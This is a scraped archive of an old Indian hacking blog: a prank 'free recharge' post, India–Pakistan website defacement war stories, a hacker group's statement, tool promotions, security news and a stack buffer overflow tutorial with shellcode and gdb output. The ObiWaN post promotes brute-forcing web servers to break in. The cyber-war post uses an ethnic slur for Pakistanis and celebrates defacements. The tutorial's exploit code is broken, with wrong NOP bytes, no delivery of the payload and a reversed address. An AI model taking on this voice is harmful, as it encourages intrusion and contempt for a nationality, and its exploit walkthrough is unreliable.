Free Recharge Any Mobile Hack – Applicable on All networks :)

Yep..I perfectly know why you are here..You wish to recharge your phone for free, probably just for funs sake or just cuz you are dying to talk with your girlfriend but don't have balance for it..or you are just here to do it for educational purposes, which is a pretty lame excuse but I can digest that. Anyways..here we go..

What you need ?

• Email ID
• Cellphone
• A registered number & sim
• Patience

How to Do it ?

open your email account by entering your username & password, & drop an email to your telecom service provider -

Dear Sir/Madam/Whatever

I would like to bring to your attention that I have been trying to learn how to recharge my cellphone account for free by searching on the internet but in vain. I am very hopeful that I would be able to find an authentic way to top up my account for free one day.

I have this funny feeling that you organization is a silly company who will allow me do unlimited top ups on my account.

Anyhow, I am a good guy and would resort to extreme ways,rather I humbly request you to provide me the recharge code of atleast 5000 INR.

Thanks for your cooperation.

Regards

Your biggest Fan :)

9XXXXXXXXX

That was easy…isn't it ?

 Just Kidding folks..I was having some harmless fun at your expense.

How actually you can Recharge your cellphone / top up for free ?

Open Notepad & type

I am fooling around with this article thats making a fool of me :)

WTF ?

Still reading ? Ah well..Sorry once again guys..Actually, what I was thinking that upto this point, any self respecting noob might have closed the browser window and moved on to a different page.

I wrote this article as I was inspired by the fake recharge/top up code calculator programs scattered all over the internet. Especially this one in which a hex editor is provided to the unassuming audience in order to increase blog SEO.Great..now on to the actual topic, you CAN have free calls, unlimited SMS & every other facility for your cellphone. You need to have (Cheap method) -

• Asterisk SwitchVOX
• SIP connection (Session Initiation Protocol)
• Knowledge of Linux + Servers
• Lots of time

OR

You can have

• Lots of Money
• MINSAT (Mobile Intelligent Network Service Administration Tool)
• Internet connection
• Lots of knowledge + time (again!!)

Due to some constant bullying by legal guys, I cant really publish the full method to go with recharges, but atleast I can give cues :D

The Intelligent will find the way..

 

like this post ? you can buy me a beer :)

Posted by XERO. ALL RIGHTS RESERVED.Source

read more "Free Recharge Any Mobile Hack – Applicable on All networks :)"

CYBER GHOST: We are live once again to provide you best cyber & hacking news

CYBER GHOST: We are live once again to provide you best cyber & hacking news

Hi Friends.. Amarjit Singh here and hope you all will be happy to see me once again. Well you will not find any old post here.. why no need to tell.

Do not ask me what happened and where I was....because I am only thinking about our new venture these days. As most of you guys are aware that Cyber Terrors will be launched on30th Oct in which I am working as co-author.....along with this we are also planning to launch a new Magazine..which will be first on its type. The magazine name is CYBER GHOST and published on monthly basis. The target is all you guys and I am damm sure the I will get a huge response from all you guys. This magazine will be launched on 7th OCT....and the venue for its launching party is CHANDIGARH, PUNJAB...Yes its my mother land Punjab.

So..I am closing here for today..keep you eyes open for tomorrow and keep visiting this blog. If you any query, just drop me a comment here

---Like this post, Just leave a comment as your feedback. If you want us to post an article on some specific topic OR have a suggestions for us...you can also drop an email on [email protected]

read more "CYBER GHOST: We are live once again to provide you best cyber & hacking news"

Remarkable Revenge against BURN QURAN DAY

Remarkable Revenge against BURN QURAN DAY

---Like this post, Just leave a comment as your feedback. If you want us to post an article on some specific topic OR have a suggestions for us...you can also drop an email on [email protected]

read more "Remarkable Revenge against BURN QURAN DAY"

Cyber war between Porki and patriotic hackers

Cyber War Between Porki & Patriotic Hackers

SOURCE: Cyber Terror

The hacking rivalry between Pakistani and Indian hackers is known to almost everyone. Pakistani hackers are known to be most unethical hacker and our Indian hackers call them porkis.

This cyber war is never going to stop. This has infected several countries across the globe. In the age of Technology wars the battles are not fought by weapons or atomic powers but it’s on raise through the advent of Information Technology, the pace of cyber wars between Pakistan and India have also been increased. Actually Information is a source of learning. But unless it is organized, processed, and available to the right people in a format for decision making, it is a burden, not a benefit.Cyberwars between the two countries first started in May 1998, when India conducted its nuclear tests. Soon after India officially announced the test, a group of UK based hackers called milw0rm broke into the Bhabha Atomic Research Center web site and posted anti-India and anti-nuclear messages.

Recently it seems like a Cyber war has been started between Pakistani Hackers and Indian hackers. This all started when IGCOE Hacker from India hacked Punjabi Pakistani Police official website. In Response to it Pakistani Hackers hacked India's several official websites. Whenever Indian hacker hacks Pakistani website they leave message on that website “You Porki You is hacked”. Porki word had come from pork, Muslims they hate pork and they treat this term as slang. May be that’s the reason Indian hackers have preferred using this word for pakihackers.

As per Indian constitution hacking is crime let it be ethical or unethical. The irony is that other nations are using these hackers to sabotage neighboring countries as well as protect their own cyber world. Actually if given a chance or If Indian hackers taken into confidence they can create wonders by protecting entire cyber network of India because India has most efficient hackers on the globe. Definitely one would like to know that who wins the battle Pakistani hackers or Indian Hackers, the answer is nun. There is nothing to win but it’s a loose .Both Pakistani and Indian websites got hacked which means that both the countries suffered security threats. This battle may result in loss of innocent people who are not the part of war. The common method which is used widely is SQL Injection.SQL Injection involves entering SQL code into web forms, eg. Login fields, or into the browser address field, to access and manipulate the database behind the site, system or application. The other methods which were used are Brute force or Dictionary Attacks. The hackers might have cracked FTP password to gain access to Server. Earlier Pakistani hackers used to be called Pakbugs and Indian hackers named HMG.

There are some so called ethical hackers over rated by media and over hyped more than their actual caliber, but some hackers do not even know who this Ankit Fadia is, There are lot of arguments and facts against him, Some people says he is not a HACKER he is just a businessman.

At the age of 14 Ankit Fadia started a website called “HackingTruths”, which he claims was judged as the “second best hacking site in the world by the FBI”. The question is that no one knows when did FBI started rating hacking sites? And suppose if FBI do so then why should they over look or neglect rating other such sites and blogs which has much more potential than fadia’s claims. FBI is and investigation agency and it has got nothing to do with the ranking of any such website. Fadia’s claims seems to be flopped because he has never created any tools for hacking. Most intelligence agencies like NSA have expert cryptanalyst with PhD’s and super fast clusters to get their job done why will they require this mature guy to do such serious job? So called great hackers website was hacked In December 2009 it was Fadia’s business site, hackingmobilephones.com was hacked by a spammer promoting pharmaceutical products for erectile dysfunction. The question remains here is why this so called “INDIA’S BEST HACKER” couldn’t protect his site from other hackers? If given a chance and assurance to capable hackers of this country they can do much much… more than Fadia. Its high time Government should take help of these hackers to protect our own cyber network and use them as cyber army.

The recent Independence Day was a nightmare for some of the webmasters and website owners of both India and Pakistan. The attack was started by Pakistani hackers defacing some Indian websites on 14th August; this was followed by counter attack from Indian Hackers. In the counter attack from both the sides’ lot of websites were hacked and defaced. The attack was started by Pakistani groups called Pak Cyber Army and PakHaxors, these groups have defaced around 10-20 websites .the counter attack was lead by Indian hackers called Indishell and Indian Cyber Army who are claiming to deface more than 2000 Pakistani websites but Zone-h data confirms the 1000+ figure.

Indian hackers always thought they were too sophisticated to fall into the hands of the rough cops in this country, whom various human rights groups routinely accuse of brutality. Why should government and police is so merciless with the hackers? They want to be on the official side of Internet security now but they are scared because they are treated as a criminal then it leaves an unpleasant taste. Indian hackers don’t have a strong united community, so it’s difficult to tell if there is a drop in activity may be that’s the reason the hackers are lying low. Nobody wants to mess again.

Cyber War Between Porki & Patriotic Hackers

SOURCE: Cyber Terror

---If you want us to post an article on some specific topic OR have a suggestions for us...you can also drop an email on [email protected]

read more "Cyber war between Porki and patriotic hackers"

Devil May Cry 5 Trailer Impressions

WTF ? DMC5 ? at TGS 2010 ? released on 15 september, I got hold on the DMC 5 traileror you can say DmC trailer.For those who dont know what Devil May Cry is, go to the corner & wear the dunce cap ! Devil May Cry is the hack & slash action game series by Capcom featuring one of the most intricate fighting system & coolest protagonist Dante, its the game against which other Hack & slash games are measured!! The new DmC  is said to be a reboot of the series.  REBOOT ?!! Ah well.. I will come to the point later, lets first have a look at the trailer.

DmC / Devil May Cry 5 Trailer TGS 2010

Man..what were they thinking ? Where the hell is all badass Dante ? The silver haired demon slayer has been dumped for this skinny juvenile ? & a Reboot ? What happened to Nero ? What about the legend of Sparda ? Man..even Hideki Kamiya, the creator of DmC commented

“I miss him, too…” and later added “I’ve been sad since Dante left me.”

In a later tweet when a fan asked the question:

“DmC by Ninja Theory? Do you think they will evolve the action game from your Bayonetta standard?”,

Kamiya-san simply said:

    “whatever”

See ? Dear Folks at Ninja Theory..Better be the game badass, else while this new Dante might prove your last stand.
Well..looking at the trailer, some things pass my mind -

• New Dante looks like ass!
• It might not be a reboot at all (.0001% chance) & this might be the story of an abandoned Dante struggling with his goddamn teenage, & later at the end of game, the prologue of Devil May Cry 3 begins.
• The visuals are improved, especially the blur & sonic effects.
• The new weapon is ass! Except the Sword..I dont like the Daggertail like thing Dante holds..The Dante I knew like to take things Up close & PERSONAL !.

We miss you Dante..

like this post ? you can buy me a beer :)

Posted by XERO. ALL RIGHTS RESERVED.Source

read more "Devil May Cry 5 Trailer Impressions"

Marshald Punk pwns Quicktime & Windows – 9 Years Old Flaw

Great…just came to know from “El Reg” how an obsolete parameter in a program separate from OS can wreak havoc. Worse, when it was a development flaw which has been in the lurch,undetected for last 9 years. A spanish security  researcher,Ruben Santamarta recently unearthed a backdoor in Apple Quicktime player that can be used to remotely exploit arbitrary code on Windows based systems. The backdoor “_Marshaled_pUnk” is bizzare in nature as it is the work of an Apple developer who added it to to the QuickTime code base and then, most likely, forgot to remove it when it was no longer needed.Adding salt to it, this can be used to exploit to take FULL control of even the latest of Windows OS- Windows 7. As told by H D Moore, CSO of Rapid7 and chief architect of the Metasploit project, to “El Reg” on monday -

“The bug is is pretty bizarre,It's not a standard vulnerability in the sense that a feature was implemented poorly. It was more kind of a leftover development piece that was left in production. It's probably an oversight.”

How the punk pwned ?

Schemes like DEP , or data execution prevention prevents any code from being executed & ASLR, or address space layout randomization, loads code into locations that an attacker cant predict there by securing parameter to some extent in Windows architecture. “_Marshaled_pUnk” however creates an object pointer equivalent that an attacker can use to load & malicious code into computer memory. In a witty maneuver, Santamarta  used a technique called return oriented programming also known as ROP to load code by loading WindowsLiveLogin.dll  into memory & reordered the commands in a way that allowed him to gain control of the testbed. Using the Microsoft DLL not only allowed him to know where in memory it would load, it also allowed him to get the code executed.

What next ?

Santamarta confirmed the exploit on the XP, Vista, and 7 versions of Windows. He also said that the parameter existed in QuickTime version dating back to 2001, when it could be used to draw contents into an existing window instead of creating a new one. The functionality was eventually removed from newer versions but the line lived on. Combined with an unrandomized DLL like the one for Windows Live, it represents a serious threat to end users. The flaw has demonstrated that the threat comes from the programs that fail to use ASLR & DEP protections, surprisingly as reviewed by Secunia ,a large number of popular applications — including Quicktime, Foxit Reader, Google Picasa, OpenOffice.org, RealPlayer, and VLC Player — neglect to use one or the other.

Till then..wait for Apple to release a patch for the 9 year old Punk.

 

like this post ? you can buy me a beer :)

Posted by XERO. ALL RIGHTS RESERVED.Source

read more "Marshald Punk pwns Quicktime & Windows – 9 Years Old Flaw"

Cyber Terrors Coming Soon: Unite Indian Hackers

Cyber Terrors Coming Soon: Unite Indian Hackers

Is it true that only Certified can join the campaign??? What is the requirement to join this?

This campaign is against Cyber Terrorism for people who are anti Indian. There is no legal certification or formal qualification to join this cause .So whether you are a Black Hat, White Hat or Grey hat id doesn’t really matter .We want to unite all the hackers in the India under one roof for their benefit, and put their skills in right and approved manner.

read more "Cyber Terrors Coming Soon: Unite Indian Hackers"

Packet-O-Matic – An Open Source Realtime Packet Processor

Packet-o-matic is a modular real time packet processor under the GPL license. It reads the packet from an input module, match the packet using rules and connection tracking information and then send it to a target module. The modular nature of packet-o-matic allows it to work for any protocol as long as its corresponding module is found. The built in management console allows you to telnet in packet-o-matic and change the configuration in real time. Main features of Packet-o-matic are :

• connection tracking currently for ipv4, ipv6, tcp, udp, rtp
• ip reassembly, tcp reordering
• match the complete protocols encapsulation i.e. "ethernet->ipv6->ipv4->udp->rtp"
• process all the packets in real time to provide the desired output

What it can do ?

• save all the VoIP calls going on an interface in separate files in real time
• reinject packets destined to a specific ip and port on another interface or save them in a file
• dump each file of all the http connections in separate files on the disk
• show the important info and an hexadecimal dump of each packet while doing the above three at the same time
• lots of other stuff which would be too long to list here

Operating System Supported : Linux

Download Packet-o-matic

Visit Official Website

 

like this post ? you can buy me a beer :)

Posted by XERO. ALL RIGHTS RESERVED.

read more "Packet-O-Matic – An Open Source Realtime Packet Processor"

ObiWaN – Server Bruteforcer by Phenoelit

ObiWaN is the brainchild of Phenoelit, a german hacker group headed by elite hacker FX which is written to carry out brute force security testing on Webservers. The goal of ObiWaN is a brute force authentication attack against Webserver with authentication requests - and in fact to break in insecure accounts. As the official documentation says -

ObiWan is written to check Webserver. The idea behind this is: Webserver with simple challenge-response authentication mechanism mostly have no switches to set up intruder lockout or delay timings for wrong passwords. In fact this is the point to start from. Every user with a HTTP connection to a host with basic authentication can try username-password combinations as long as he/she like it.
Like other programs for UNIX system passwords (crack) or NT passwords (l0phtcrack) ObiWaN uses wordlists and alternations of numeric or alpha-numeric characters as possible passwords. Since Webservers allow unlimited requests it is a question of time and bandwith to break in a server system.

ObiWaN manipulates a weakness in HTTP protocol, which as explained by Phenoelit itself is that nearly all servers allow unlimited username/password tries for a user & it literally becomes a question of time and bandwith to break in a server. After you break-in,you are the alpha & the omega of server..

enjoy :)

Download ObiWaN

Read Documentation

 

like this post ? you can buy me a beer :)

Posted by XERO. ALL RIGHTS RESERVED.

read more "ObiWaN – Server Bruteforcer by Phenoelit"

Let's Build a Responsible Cyber Society

WHO HACKED VIJAY MALLYA? Mystry unsolved...

On Aug 15, 2010, hackers took over the website of high profile Indian businessman, politician and IPL team owner, Vijay Mallya. The hackers posted pro Pakistani messages and signed off as Pakistan Cyber Army (PCA). At least 6 national Indian media interviewed Vijay Mallya about his site being hacked. PCA has released a statement to news media explaining what really happened.

On Aug 16, Techgoss (TG) had published an article speculating whether the long standing cyber cease fire between organized Indian and Pakistani hacker groups had broken down and if we were witnessing an organized hacking war again.

On Aug 20, my Techgoss colleague Shalini Singh had published an article about Vijay Mallya tweeting that his computing team had ‘un-hacked’ his website. Business tycoon Vijay also tweeted that they had traced the hacker to Lahore. This article had also speculated if the attack on Vijay Mallya had actually been done by an individual rather than a hacker group.

On Aug 24, 2010, the Pakistan Cyber Army released the following statement. In this statement, the Pakistan Cyber Army makes it clear that they were not behind the hacking of Mallya’s website. The Pakistan Cyber Army also makes it clear that they are working with Indian techie Gaurav to work out practical ways to stop the hacking of sites in each other’s countries.“We are Pakistan Cyber Army - the hackers of famous ONGC India and many other websites in November 2008. The recent defacement of "Vijay Mallya" website is being associated with us We are sending our statement regarding this particular incident. "Pakistan Cyber army is not involved in any of the recent defacements done by any hacker. We are happy that the concept of “Pakistan Cyber Army” has become so popular that many in Pakistan are using our name. Different hacking groups in countries like Iran, Afghanistan, and India have adapted the same naming convention for their names.

Please do not associate "Pakistan Cyber Army which has only three members HAroon aka D45H, Hamza aka R4yd3n and Abunasar aka Abunasar” with any other hacking groups from Pakistan. There are a bunch of guys who are operating by using our name in websites and forums.

Pakistan Cyber Army is only for retaliation but only in the most severe cases of attacks on our sites. We do not have any website, blog, forum, email, Facebook group and Orkut community. None of you out there can contact us or find us unless we find and contact you by ourselves.

We have no association or contact with ISI or any agency of Pakistan nor are we supported by Pakistan Government. Pakistan has to deal with many great challenges.The current defacements which are going on can’t be called as cyber war. By defacing random websites is just like wall chalking. The idea of "Pakistan Cyber Army" was totally genuine and as mentioned in our previous messages comes with in 5 minutes. Our attack in November 2008 wasn’t similar to these defacements which are occurring these days/months. We attacked the chain of schools of Indian Army "Kendriya Vidyalaya website kvrtm.org.in" Because ICW/HMG hacked one of our School chain.

We hacked "Indian Institute of Remote Sensing website iirs.gov.in" Because ICW/HMG hacked one of our Girl Colleges in Gojra. We hacked "Syscontech website syscontech.in" because ICW/HMG hacked one of our software houses. We hacked "Indian Railway Website indianrail.gov.in" because ICW/HMG hacked one of our transportation website. The website of Oil and Natural Gas Cooperation limited website was hacked "ongc.com" because ICW/HMG hacked into our Oil & Gas Regulatory Authority. People & media thought that we hacked only ONGC as a planned target and others as random. That was not the case. We defaced each and every thing in same industry and same stature and all of our defacements were targeted. But still you can’t call our defacements as cyber war. Cyber war is a bigger term which means attacking on our IT infrastructure and make it impossible to recover. Pakistan Cyber Army Alhamdolillah has the capability to go far more then the website defacement if we are to retaliate and we have no such intention to attack. Pakistan Cyber Army is for peace.

We PCA have really no time to be involved in wall chalking/defacing websites. We have many better things to do in Life. We are sleeping but not dead. If anyone, not only India, tries to damage our IT, Telecom and Defense infrastructure we have a right to again retaliate and give them the best of possible answers. People at HMG/ICW respect us and we respect them too. Our peace deal with ICW/HMG still exists. I would like to mention Gaurav aka r45c4lh4ck3r from HMG. He is really a nice guy who made this deal possible. In the end we would like to clarify that we were not involved in the useless defacement of "Vijay Mallya" website. But it can be considered as answer from “Pakistan Cyber Army (new one)” because on 14th of August 2010 “Indian Cyber Army” defaced some 1200 Websites. We are in contact with "Indian Cyber Army & Pakistan Cyber Army (new one)" and we are trying to make a peace deal between those two groups as well.

Defacing website is a crime but to take it as threat to national security is similar to taking a knife as an atom bomb.Our message to the young people is to concentrate on their studies and comes with something good for both of the countries. Do polish your skills if you want to be a hacker or are a hacker. There is a thin line between hacker and criminal. The person who steals email, bank accounts, credit cards etc should be called as criminal not a hacker. So guys study well and make your parents happy. If you get arrested for doing website defacement, the first ones who will be disappointed and shocked will be your parents.

We are for Peace “We are sleeping but Not Dead” Pakistan Cyber Army

HAroon aka D45h, Hamza aka R4yd3n and Abunasar aka Abunasar"

Terrorism is a curse for the society that we live in.Our lives have changed irrevocably today because of the terrorism threats which surround all of us.We don’t know if there could be a terrorist attack in the plane we plan to catch or on the train we commute or even in the mall which we regularly shop or the hotel where we stay.While the physical world struggles to cope with the problems of terrorism, the cyber world has its own concerns on “Cyber Terrorism”. ITA 2008 has defined an offence under Section 66F called “Cyber Terrorism”.This issue tries to explore the legal aspects of this clause particularly how it may impact a corporate entity.

read more "Let's Build a Responsible Cyber Society"

5 more sites for Security Basics

last time I blogged about 5 sites for Budding Hackers & followed up with  5 more sites for budding hackers... but as the user queries flood my inbox for more, I decided to dig a bit more & publish some of the more prominent sites I visit in my free time. The following blogs are prominient & hot favorites for security essentials & are full of resources which will enhance your skill set. A must visit list -

Securitytube
watch-learn-contribute..A site packed with lots of security related videos,resources & up to date news.

Offensive Security
Need I say more ? The creators of the reknowned security distro Backtrack maintain one of the best happening forums on security. The link above relates to backtrack tutorials & forums, explore & learn..as always,the quieter you become, the better you are able to hear.

SmashTheStack
Like Wargames ? Smash the stack is your portal for the ultimate wargames which will escalate your level from nothing to something..pay attention,play well & learn.

PaulDotCom
One of my favorite security podcasts,the website provides insightful papers,presentations & discusses on hot security topics.

Tuts 4 You
Reverse engineering anyone ? Tuts4You is a community for researchers and reverse engineers interested in the field of Reverse Code Engineering (RCE). Great tuts..Great resources..

Like This post ?  You can buy me a Beer :)
Posted by XERO. ALL RIGHTS RESERVED.

read more "5 more sites for Security Basics"

Hackers create 57,000 fake web addresses weekly

According to a three month long study carried out by PandaLabs – the research arm of Panda Security – each week, hackers are creating 57 000 new fake web addresses to trick or infect users.

Panda says that in an average week, hackers use some 375 different high-profile names and company brands to lure users.

Interestingly, Panda claims that 65% of fake websites imitate bank pages, followed by online stores and auction pages at 27%.

For its research, PandaLabs says it analysed malicious URLs positioned on the internet that hackers use to trick users into downloading malware or directly steal their bank details.

As well as banks, fake online stores such as eBay are used by hackers to steal users' login credentials.

Other financial institutions, such as investment funds, stockbrokers, and government organisations, occupy the following positions, with 2.3% and 1.9% respectively. The latter government organisations are, says Panda, largely accounted for by the US revenue service or other tax collecting agencies.

Payment platforms, led by Paypal, and ISPs are in fifth and sixth place, whilst gaming sites – topped by World of Warcraft – complete the rankings.

Luis Corrons, PandaLabs' technical director, said that the problem is that, when users visit a website through search engines, it can be difficult for users to know whether it is genuine or not. "For this reason, and given the proliferation of this technique, it is advisable to go to banking sites or online stores by typing in the address in the browser, rather than using search engines", he said.

This article is featured in:

Malware and Hardware Security

read more "Hackers create 57,000 fake web addresses weekly"

Hackers Exploit Twitter XSS Flaw

A dangerous XSS bug surfaced on Twitter on Monday, and researchers have seen active exploits for the bug, which allows an attacker to steal the session cookie of a Twitter user with a simple click-and-you're-owned technique.

Experts say that the attacks seem to be emanating from domains in Brazil, and that more than 100,000 users had already clicked on one malicious shortened URL related to the attack.And that's just one link. It's unclear how many other malicious links have been created to exploit this flaw.

"The malicious JavaScript payload that's being distributed is rather simple. It uses an XSS (Cross-Site Scripting) vulnerability to steal the cookie of the Twitter user, which is transferred to two specific servers. Essentially, any account which clicked on the malicious links is compromised," Stefan Tanase, an anti-malware researcher who specializes in social networking threats at Kaspersky Lab, said in an analysis of the Twitter exploit.

"All clues point to Brazil as the originating country for this attack. First, the 2 domain names used to get the stolen cookies are registered under Brazilian names. More than that, one of them is actually also hosted in Brazil."

One of the tweets used to direct users to the malicious site exploiting the XSS bug is written in Brazilian Portuguese and references a Brazilian band.

Twitter officials said on Tuesday morning that the vulnerability has been fixed. However, the XSS flaw, which was on one of the many sub-domains that Twitter maintains, may just be the tip of the iceberg for the massively popular social networking platform. The shortened URLs that are essentially mandatory on Twitter, thanks to the platform's 140-character limit on messages, are a serious weak link in the site's security.

FULL STORY HERE

read more "Hackers Exploit Twitter XSS Flaw"

Euro-Islam was Hacked: Back to Normal Operations

Euro-Islam was Recently Hacked & are Back to Normal Operations Now

As per Euro-Islam member "Recently, Euro-Islam was hacked as a result of malicious hackers targeting Mediatemple’s (Our host) customers. Unfortunately, clean up took longer than expected. However, you can rest assured that we have taken several steps to prevent this issue from occurring again. Our researches have continued to compile news during the site’s blackout and all information is now posted online. We are resuming a normal schedule; you can expect to see new news added every week."

You can rest assure no personal information on users was gathered.

read more "Euro-Islam was Hacked: Back to Normal Operations"

Buffer Overflow Attack tutorial by example

A Buffer Overflow is a flaw by which a program reacts abnormally when the memory buffers are overloaded, hence writing over adjacent memory. It can be triggered by using inputs that may alter the way a program operates,for example <inputting a very large value in a c program which does integer based addition>. A buffer overflow can lead to program crash, memory access error, garbage outputs & worse, breach of system security. Probably, you might have seen prominent buffer overflow based exploits & attacks in Metaspl0it or any other spl0it framework. Why I am writing this ? well..I found an excellent article on buffer overflow by eXeCuTeR <executerx[at]gmail[dot]com> & thought you might wanna have a look at it. Its exlplained in quite easy language with very basic example.
read & learn..

Our vuln program:

---------- bof.c --------------

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
char str[10];
strcpy(str, argv[1]);
printf("Done");

return 0;
}

---------- bof.c --------------

As you see, argv[1] is copied to str (str can contains 10 characters)
Try to think - What happens when we load more than 10 bytes on str? You'll see.

Lets try compile the program and load 12 bytes:

niv@niv-desktop:~/Desktop$ gcc-3.3 bof.c -o bof
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x12'`
Doneniv@niv-desktop:~/Desktop$

The program has been successfully compiled even though we loaded 12 bytes, which means 12 bytes aren't enough to overflow the program.


Lets try to overflow the program with 14 bytes:

niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x14'`
Doneniv@niv-desktop:~/Desktop$

Failed. Again.

Lets load 32 bytes this time:

niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x32'`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$

In case it says: /*** stack smashing detected ***/ or something that appears to be like this error, just go to the terminal, type: sudo apt-get install gcc-3.3 and when compiling it type gcc-3.3 example.c -o example instead of gcc example.c -o example.

We made it, we overflowed the program.

Now we'll check more further what exactly happend:

niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e 'print "A"x60'`
Starting program: /home/niv/Desktop/bof `perl -e 'print "A"x32'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r eip
eip            0x41414141       0x41414141

We overwrited the EIP with A's (A = 41 in hex) - The EIP is the Instructor Pointer, it points at the next instruction.

Now we can start writing our exploit.
Our exploit is gonna contain the NOPSLED + Shellcode + the address of the shellcode (the RET).
The NOPSLED is a chain of 0x90's (NOPSLED = NO OPeration) so the NOPSLED will be placed before our shellcode.
The NOPSLED helps us so we don't have to jump exactly to the place in memory where our shellcode begins.

---------- exploit.c --------------
#include <stdio.h>
#include <string.h>

char exploit[2048];

int main(void)
{
int i;
/*
 * (linux/x86) eject cd-rom (follows "/dev/cdrom" symlink) + exit() - 40 bytes
 * - izik <[email protected]>
 */
char shellcode[] =    
    "\x6a\x05"              // push $0x5
    "\x58"                  // pop %eax
    "\x31\xc9"              // xor %ecx,%ecx
    "\x51"                  // push %ecx
    "\xb5\x08"              // mov $0x8,%ch
    "\x68\x64\x72\x6f\x6d"  // push $0x6d6f7264
    "\x68\x65\x76\x2f\x63"  // push $0x632f7665
    "\x68\x2f\x2f\x2f\x64"  // push $0x642f2f2f
    "\x89\xe3"              // mov %esp,%ebx
    "\xcd\x80"              // int $0x80
    "\x89\xc3"              // mov %eax,%ebx
    "\xb0\x36"              // mov $0x36,%al
    "\x66\xb9\x09\x53"      // mov $0x5309,%cx
    "\xcd\x80"              // int $0x80
    "\x40"                  // inc %eax
    "\xcd\x80";             // int $0x80

for(i = 0; i < 512; i++)
    strcat(exploit, "0x90");

strcat(exploit, shellcode);

printf("Loaded.\n");

return 0;
}
---------- exploit.c --------------

niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.

Run our vuln program so we could find the RET, the address of our shellcode.
After we run it, we'll look for the ESP - the ESP points on the last element used on the stack.
Check this out:

niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x60'`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e 'print "A"x60'`
Starting program: /home/niv/Desktop/bof `perl -e 'print "A"x60'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/s $esp

You're gonna get these things:

0xbf949694:      "`???}_???o??\002"
(gdb)
0xbf9496a2:      ""

etc'...
Keep searching until you see something like this thing:

0xbf9496e0:"7?\224?J?\224?U?\224?i?\224?y?\224??\224?\002?\224?\024?\224?*?\224?3?\224???\224??\224?\v?\224?\030?\224?N?\224?Y?\224?q?\224???\224??\224???\224???\224?\025?\224?&?\224?;?\224?D?\224?W?\224?n?\224?v?\224?\205?\224???\224???\224?\024?\224?P?\224?p?\224?}?\224?\212?\224???\224??\224?"

0xbf9496e0 is the address of our shellcode (the RET)
To make our exploit work properly, we need to overwrite the EIP with our shellcode.We'll take our old address (0xbf9496e0) and do this thing:

Take our address and make it look this way: bf 94 96 e0
Grab the last bytes (e0) and do the following:
we'll block the characters between \'s (slashes), add x in each block -> \xe0\
you'll do the same to each 2 chars and then put them in order that the last bytes of our the address will be the first one in our new address:

0xbf9496e0 -> \xe0\x96\x94\xbf

Now, we are gonna reach our shellcode this way:
Since we overflowed the program with 32 bytes (32 A's),
and our RET's length is 4 bytes we are gonna subtract the length of our shellcode address(the RET) of the A's,
and we are gonna print 28 A's (32 A's - 4 bytes (RET's length) = 28) and the RET so we could reach the shellcode successfully.

niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x28'``printf
"\xbf\x94\x96\xe0"`

I suppose you already understood what's about to happen if you have read the exploit :)

Like This post ?  You can buy me a Beer :)

Posted by XERO. ALL RIGHTS RESERVED.

read more "Buffer Overflow Attack tutorial by example"

Revolutionary Step Taken By Vaidehi Sachin: Uniting All the Indian Hackers

Revolutionary Step Taken By Vaidehi Sachin: Uniting All the Indian Hackers

CLICK HERE FOR FULL STORY

Vaidehi Sachin is a group editor of News makers broadcasting communication and also the publisher of afternoon voice, daily eveninger from mumbai. Recentely she is writing book on cyber terros and uniting all the Indian hackers to put them in right direction under an organisation for the welfare of our country. Vaidehi is award winning writer and investigative journalist

read more "Revolutionary Step Taken By Vaidehi Sachin: Uniting All the Indian Hackers"

Indian voting machine hacker released

AN INDIAN HACKER who managed to show how it was a doddle to steal an election using electronic voting machines has been released from the clutches of the local constabulary.

E-voting researcher Hari Prasad was released from jail after seven days in police custody.

According to Freedom to Tinker Prasad was released following an order from Magistrate D H Sharma. Sharma praised Hari and made strong comments against the police. Prasad did a great service for his country, the magistrate said.

Prasad was arrested after he showed how to hack an electronic voting machine in front of a group of academics. The problem, according to the coppers who arrested him, was not that he had hacked the machine but rather where he got it in the first place.

The voting machines are supposed to be super secure, but as Prasad pointed out, they are anything but. If he could hack one so easily, then any corrupt politician with a bit of money could have the same thing done.

But Prasad's demonstration showed that the Election Commission's plans to role out the machines were flawed.

It seems that soon after the demonstration, the embarrassed Commission made a complaint to the local plod. Since Prasad refused to say where he got the machine, which had been donated anonymously, they locked him up.

read more "Indian voting machine hacker released"

SImple Malware Scanner (Offline & Online)

Earlier I wrote about how to scan a file using multiple antiviruses online, however, alternatively you can check the md5 hash of the file & compare it to the valid one in an offline database..or can validate it at an online one like VirusTotal. The specified action is done by a program known as "Simple Malware Check Tool" developed by Mert Sarica. The program has http proxy support & update feature.

You can easily check the hash by running -

python malware_check.py online malware.exe

This command calculates the md5 hash of a specified file (ex: malware.exe), submits it to http://www.virustotal.com
and then shows the result. To check Offline, you need to run -

python malware_check.py offline malware.exe

